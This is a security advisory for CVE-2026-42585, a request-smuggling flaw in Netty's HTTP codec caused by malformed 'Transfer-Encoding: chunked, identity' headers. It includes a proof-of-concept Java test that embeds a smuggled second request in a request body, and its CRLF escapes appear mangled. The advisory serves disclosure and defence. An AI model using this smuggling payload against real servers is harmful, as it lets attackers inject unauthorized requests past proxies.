PT-2026-38377 · Maven · Io.Netty:Netty-Codec-Http

Published

2026-05-07

·

Updated

2026-05-07

·

CVE-2026-42585

CVSS v3.1

6.5

Medium

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Summary

Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.

Details

Netty incorrectly marks a request as chunked when malformed "Transfer-Encoding: chunked, identity" is present. According to RFC https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length
" If a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding, the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request) status code and then close the connection. "
A possible scenario is when Netty is behind a proxy that doesn't reject requests with "Transfer-Encoding: chunked, identity", but prefers "Content-Length" and forwards the content to Netty.

PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body.
@Test
  public void test() {
    String requestStr = "POST / HTTP/1.1r
" +
        "Host: localhostr
" +
        "Transfer-Encoding: chunked, identityr
" +
        "Content-Length: 48r
" +
        "r
" +
        "0r
" +
        "r
" +
        "GET /smuggled HTTP/1.1r
" +
        "Host: localhostr
" +
        "r
";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    assertTrue(request.headers().contains("Transfer-Encoding"));
    assertFalse(request.headers().contains("Content-Length"));
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
  }

Impact

HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Fix

HTTP Request/Response Smuggling

Weakness Enumeration

CWE-444

Related Identifiers

CVE-2026-42585
GHSA-38F8-5428-X5CV

Affected Products

Io.Netty:Netty-Codec-Http